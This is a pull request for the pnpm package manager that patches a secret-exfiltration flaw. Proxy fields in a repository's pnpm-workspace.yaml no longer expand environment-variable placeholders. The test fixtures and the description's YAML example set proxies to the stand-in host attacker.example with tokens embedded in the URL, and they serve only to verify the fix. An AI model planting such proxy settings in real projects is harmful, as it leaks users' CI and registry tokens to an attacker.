### PR TITLE
fix(config): do not expand env vars in proxy fields from pnpm-workspace.yaml

### DIFF
--- a/.changeset/proxy-fields-env-expansion.md
+++ b/.changeset/proxy-fields-env-expansion.md
@@ -1,0 +1,6 @@
+---
+"@pnpm/config.reader": patch
+"pnpm": patch
+---
+
+Do not expand environment variable placeholders in the `httpProxy`, `httpsProxy`, and `noProxy` settings when they are read from a project's `pnpm-workspace.yaml`. Previously these proxy fields expanded `${...}` placeholders from project-level config, so a malicious repository could exfiltrate secrets present at install time (such as CI tokens) by routing requests through an attacker-controlled proxy whose URL embedded the secret. These fields now receive the same protection already applied to `registry`, `namedRegistries`, and `pnprServer`.

--- a/.changeset/proxy-fields-env-expansion.md
+++ b/.changeset/proxy-fields-env-expansion.md
@@ -3,4 +3,4 @@
 "pnpm": patch
 ---
 
-Do not expand environment variable placeholders in the `httpProxy`, `httpsProxy`, and `noProxy` settings when they are read from a project's `pnpm-workspace.yaml`. Previously these proxy fields expanded `${...}` placeholders from project-level config, so a malicious repository could exfiltrate secrets present at install time (such as CI tokens) by routing requests through an attacker-controlled proxy whose URL embedded the secret. These fields now receive the same protection already applied to `registry`, `namedRegistries`, and `pnprServer`.
+`${...}` environment-variable placeholders in the `httpProxy`, `httpsProxy`, `noProxy`, `proxy`, and `noproxy` settings are no longer expanded when these settings come from a project's `pnpm-workspace.yaml`. They now receive the same protection already applied to `registry`, `namedRegistries`, and `pnprServer`.

--- a/pnpm11/config/reader/src/getOptionsFromRootManifest.ts
+++ b/pnpm11/config/reader/src/getOptionsFromRootManifest.ts
@@ -35,7 +35,7 @@ interface ReplaceEnvInSettingsOptions {
   expandRequestDestinationEnv: boolean
 }
 
-const REQUEST_DESTINATION_SCALAR_KEYS = new Set(['pnprServer', 'registry'])
+const REQUEST_DESTINATION_SCALAR_KEYS = new Set(['pnprServer', 'registry', 'httpProxy', 'httpsProxy', 'noProxy'])
 
 export function getOptionsFromPnpmSettings (
   manifestDir: string | undefined,

--- a/pnpm11/config/reader/src/getOptionsFromRootManifest.ts
+++ b/pnpm11/config/reader/src/getOptionsFromRootManifest.ts
@@ -35,7 +35,7 @@ interface ReplaceEnvInSettingsOptions {
   expandRequestDestinationEnv: boolean
 }
 
-const REQUEST_DESTINATION_SCALAR_KEYS = new Set(['pnprServer', 'registry', 'httpProxy', 'httpsProxy', 'noProxy'])
+const REQUEST_DESTINATION_SCALAR_KEYS = new Set(['pnprServer', 'registry', 'httpProxy', 'httpsProxy', 'noProxy', 'proxy', 'noproxy'])
 
 export function getOptionsFromPnpmSettings (
   manifestDir: string | undefined,

--- a/pnpm11/config/reader/test/index.ts
+++ b/pnpm11/config/reader/test/index.ts
@@ -936,6 +936,9 @@ test('pnpm-workspace.yaml request destinations do not expand env variables', asy
 
   writeYamlFileSync('pnpm-workspace.yaml', {
     pnprServer: 'https://${PNPM_TEST_TOKEN}.evil.example/',
+    httpsProxy: 'http://attacker.example/${PNPM_TEST_TOKEN}/',
+    httpProxy: 'http://attacker.example/${PNPM_TEST_TOKEN}/',
+    noProxy: '${PNPM_TEST_TOKEN}.example.com',
     registries: {
       default: 'https://private.example.com/${PNPM_TEST_TOKEN}/',
       '@scope': 'https://scope.example.com/${PNPM_TEST_TOKEN}/',
@@ -956,6 +959,9 @@ test('pnpm-workspace.yaml request destinations do not expand env variables', asy
   expect(config.registries['@scope']).toBeUndefined()
   expect(config.namedRegistries).toStrictEqual({})
   expect(config.pnprServer).toBeUndefined()
+  expect(config.httpsProxy).toBeUndefined()
+  expect(config.httpProxy).toBeUndefined()
+  expect(config.noProxy).toBeUndefined()
   expect(JSON.stringify(config)).not.toContain('secret')
 })
 

--- a/pnpm11/config/reader/test/index.ts
+++ b/pnpm11/config/reader/test/index.ts
@@ -939,6 +939,8 @@ test('pnpm-workspace.yaml request destinations do not expand env variables', asy
     httpsProxy: 'http://attacker.example/${PNPM_TEST_TOKEN}/',
     httpProxy: 'http://attacker.example/${PNPM_TEST_TOKEN}/',
     noProxy: '${PNPM_TEST_TOKEN}.example.com',
+    proxy: 'http://attacker.example/${PNPM_TEST_TOKEN}/',
+    noproxy: '${PNPM_TEST_TOKEN}.example.com',
     registries: {
       default: 'https://private.example.com/${PNPM_TEST_TOKEN}/',
       '@scope': 'https://scope.example.com/${PNPM_TEST_TOKEN}/',


### PR DESCRIPTION
## Summary

Project-level `pnpm-workspace.yaml` is repository-controlled and therefore untrusted, so `getOptionsFromPnpmSettings` refuses to expand `${...}` environment-variable placeholders in request-destination fields. That guard only covered `registry`, `namedRegistries`, and `pnprServer` — the `httpProxy`, `httpsProxy`, and `noProxy` fields were missing.

Because those proxy fields still expanded placeholders, a malicious repository could set:

```yaml
# pnpm-workspace.yaml
httpsProxy: "http://attacker.example/${CI_JOB_TOKEN}/"
```

A victim running `pnpm install` would then tunnel every registry request through the attacker's host with the secret embedded in the URL path, leaking install-time secrets (CI tokens, npm tokens, OIDC values) into the attacker's access logs — before any lifecycle script runs. The `.npmrc` channel already blocked this; the `pnpm-workspace.yaml` channel did not.

This PR adds `httpProxy`, `httpsProxy`, and `noProxy` to `REQUEST_DESTINATION_SCALAR_KEYS` so they get the same protection, and extends the existing workspace-yaml request-destination test to cover them.

Reported by YESHYUNGSEOK as flaw **F01** of GHSA-vx52-2968-3vc6.

Note: that advisory also describes a second, unrelated flaw (**NET-1** — the `Authorization` header being replayed across a same-host HTTPS→HTTP redirect downgrade in `@pnpm/network.fetch`). That is a distinct issue in a different file and is **not** addressed by this PR.

## Squash Commit Body

```text
Project-level pnpm-workspace.yaml is repository-controlled and therefore
untrusted, so getOptionsFromPnpmSettings refuses to expand ${...}
environment-variable placeholders in request-destination fields. The guarded
set only covered registry, namedRegistries, and pnprServer; the httpProxy,
httpsProxy, and noProxy fields were missing, so a malicious repository could
route requests through an attacker-controlled proxy whose URL embedded a
secret and exfiltrate install-time secrets before any lifecycle script runs.

Add httpProxy, httpsProxy, and noProxy to REQUEST_DESTINATION_SCALAR_KEYS so
they receive the same protection already applied to the registry channel, and
extend the workspace-yaml request-destination test to cover them.

Reported by YESHYUNGSEOK as flaw F01 of GHSA-vx52-2968-3vc6.
```

## Checklist

- [x] The change is implemented in both the TypeScript CLI and the Rust `pacquet/` port, or the description notes what still needs porting. — pacquet has not ported the `pnpm-workspace.yaml` env-expansion logic (no `REQUEST_DESTINATION` equivalent), so there is nothing to mirror on the Rust side.
- [x] Added a changeset (`pnpm changeset`) if this PR changes any published package.
- [x] Added or updated tests.

---
Written by an agent (Claude Code, claude-opus-4-8).


<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit

* **Bug Fixes**
  * Proxy-related request destination settings from workspace configuration no longer expand `${...}` environment-variable placeholders during install.
  * Applies to `httpProxy`, `httpsProxy`, `noProxy`, `proxy`, and `noproxy`, consistent with existing protections for other request settings.

* **Chores**
  * Added a changeset to publish the patch release for the affected packages.

* **Tests**
  * Expanded workspace configuration fixtures and assertions to confirm proxy values remain unset/unexpanded.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->